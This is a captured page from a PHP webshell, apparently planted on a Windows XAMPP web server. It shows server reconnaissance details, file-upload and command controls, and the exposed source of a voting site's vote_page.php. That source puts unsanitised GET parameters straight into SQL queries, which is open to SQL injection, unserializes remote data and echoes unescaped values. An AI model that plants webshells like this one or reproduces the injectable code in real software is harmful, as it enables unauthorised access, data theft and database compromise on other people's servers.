403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xamppkk/htdocs-coblaa/cbawards/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : D:/xamppkk/htdocs-coblaa/cbawards/vote_page.php
<html>
<?php
include('db.php');
session_start();
if(isset($_SESSION['id']))
{
$my_id = $_SESSION['id'];		

}
$p_mark = 400;
//////////////////////////////////////////////////////////////////////////////////// 
?>
<input id="my_id" style="display:none;" value="<?php echo"$my_id";?>" />
<div style="display:none" >
<?php
$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$country = $geo["geoplugin_countryName"];
//echo" mmm $user_ip";
/////////////////////////////////////////////////////////////////////////////////////// 
$cur_date = date("d");
$cur_month = date("M");
$cur_year = date("Y");
/////////////////////////////////////////////////////////////////////////////////////// 
?>
</div>
<head>
<title>cbawards</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="main_css/vote_page.css" />

</head>

<body>

<div class="main_container" >
<img src="main_icon/cb_awad_log.png" class="cb_awad_log" />
<h1 class="main_title" >CB Awards</h1>
<img src="main_icon/cross.png" onClick="history.back();" class="close_page_icon" />

<!--div class="sub_title" >Vote Now</div-->


<div class="main_vid_div" > 

<?php 
if(isset($_GET['competing_vid']))
{ $vid_id = $_GET['competing_vid'];

if(!isset($_SESSION['id'])){$my_id = $user_ip; }

	$get_vid_view ="select * from video_viewtb where video_id='$vid_id' AND user_id='$my_id' ";
	$run_get_vid_view = mysqli_query($con,$get_vid_view);
	$check_vid_view = mysqli_num_rows($run_get_vid_view);
	if($check_vid_view <1){
	
	$insert_vid_view ="insert into video_viewtb (video_id,user_id,cur_country,cur_city,cur_date,cur_month,cur_year,cur_time ) 
	values('$vid_id','$my_id','$country','$city','$cur_date','$cur_month','$cur_year',CURTIME() )";
	$run_vid_view = mysqli_query($con,$insert_vid_view);   
	}

	$get_vid ="select * from user_videotb where id='$vid_id' ";
	$run_get_vid = mysqli_query($con,$get_vid);
	while($row_get_vid = mysqli_fetch_array($run_get_vid))
	{
	    $user_id = $row_get_vid['my_id'];
		$cur_vid = $row_get_vid['video_url'];
        $type_vid = $row_get_vid['video_type'];	
	
	
	$get_user ="select * from cb_award_usertb where id='$user_id' ";
	$run_user = mysqli_query($con,$get_user );
	while($row_user  = mysqli_fetch_array($run_user ))
	{

		$username = $row_user['user_name'];
		$user_profile = $row_user['user_profile'];
		$img_type = $row_user['img_type'];
	
	
?>
<input id="cur_vid_id" value="<?php echo $vid_id ;?>" class="help_input" />

<div class="sub_vid_div" >
<div class="vid_cover" >
<video id="vid_player" class="vid_tag" controls kautoplay >
  <source src="main_vid/<?php echo $cur_vid.'.'.$type_vid ?>" type="video/mp4">
  <source src="main_vid/<?php echo $cur_vid ?>.ogg" type="video/ogg">
  Your browser does not support the video tag.
</video>
<img id="vid_play_btn3" src="thumb_img/<?php echo $user_profile.'.'.$img_type; ?>" class="vid_thumb" />
</div>
<input id="cur_vid_src" value="main_vid/<?php echo $cur_vid.'.'.$type_vid ?>" class="help_input" />

<img id="vid_play_btn1" src="main_icon/play_btn.png" onClick="cur_vid_play();" class="player_btn_icon" />
<span id="vid_play_btn2" onClick="cur_vid_play();" class="player_btn_lebal" >Click to play</span>

<div class="vid_lebal_div" >
<span class="vid_parti_name" ><?php echo $username; ?></span>

<?php if(isset($_SESSION['id'])){ ?>
<span onClick="show_voting_area();" class="Vote_lebal" ><span>Vote</span><img src="main_icon/tick.png" class="cb_tick_icon" /></span>
<?php }else{ ?>
<a href='join_competition'><span class="Vote_lebal" ><span>Vote</span><img src="main_icon/tick.png" class="cb_tick_icon" /></span></a>
<?php }?>
<button id="activate_vote_now"  name="<?php echo $vid_id; ?>" onClick="vote_video_now(this.name)" class="help_btn" ></button>
</div>

<div class="vid_lebal_div" >
<?php
	$check_vot_count ="select * from video_votetb where video_id='$vid_id'";
	$run_vot_count= mysqli_query($con,$check_vot_count);
	$vot_count= mysqli_num_rows($run_vot_count);
	$perc_count = ($vot_count / $p_mark)*100;

?>
<div class="vid_views_div" >
<img src="main_icon/eyeicon.png" class="vid_views_img" />
<span id="vid_views_output" class="vid_views_lebal"><?php echo""; ?></span>
</div>
<span class="Vote_perc_lebal"><?Php echo $perc_count ?>%</span>

</div>

</div>




<span id="error_output" class="error_output" ></span>
</div>


<div id="comfirm_vote_help" class="comfirm_vote_help" >
<div class="comfirm_vote" >
<span class="comfirm_vote_title">You are voting <?php echo $username; ?></span>
<button onClick="not_voting();" class="voting_btn" style="border:1px solid red;color:red;" >No</button>
<button onClick="document.getElementById('activate_vote_now').click();" class="voting_btn" style="border:1px solid green;color:green;" >Yes</button>
</div>

</div>

<?php } } } ?>

</div> 

<button id="copy_app_link_btn" onClick="copyText();" class="copy_app_link_btn" >Copy & Share Link</button>

<script>

function cur_vid_play()
{
	cur_vid_src = document.getElementById('cur_vid_src').value;
	document.getElementById('vid_player').style.display="block";
	document.getElementById('vid_play_btn1').style.display="none";
	document.getElementById('vid_play_btn2').style.display="none";
	document.getElementById('vid_play_btn3').style.display="none";
	document.getElementById('vid_player').play();
	
	//alert(cur_vid_src);
}

function show_voting_area()
{
document.getElementById('comfirm_vote_help').style="display:block;display:flex;align-items:center;justify-content:center;	";	
}

function not_voting()
{
document.getElementById('comfirm_vote_help').style.display="none";	
}

function vote_video_now(vvn)
{ 
	voted_video_id = vvn;
	my_id = document.getElementById('my_id').value;
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","auto_page.php?my_id="+my_id+"&&voted_video_id="+voted_video_id+"&&status=vote_video_now",false);
	xmlhttp.send(null);
	document.getElementById('error_output').innerHTML =xmlhttp.responseText;
    document.getElementById('comfirm_vote_help').style.display="none";		
	
}
show_vid_view();
function show_vid_view()
{

	cur_vid_id = document.getElementById('cur_vid_id').value;
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","auto_page.php?cur_vid_id="+cur_vid_id+"&&status=show_vid_view",false);
	xmlhttp.send(null);
	document.getElementById('vid_views_output').innerHTML =xmlhttp.responseText;	
}


function copyText(){
     
            /* Copy text into clipboard */
		alert(52);	
    navigator.clipboard.writeText();//("https://play.google.com/store/apps/details?id=com.craneblue.cbvote");
	alert(52);
	document.getElementById('copy_app_link_btn').innerHTML="Link copied";
	alert(52);
}



</script>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit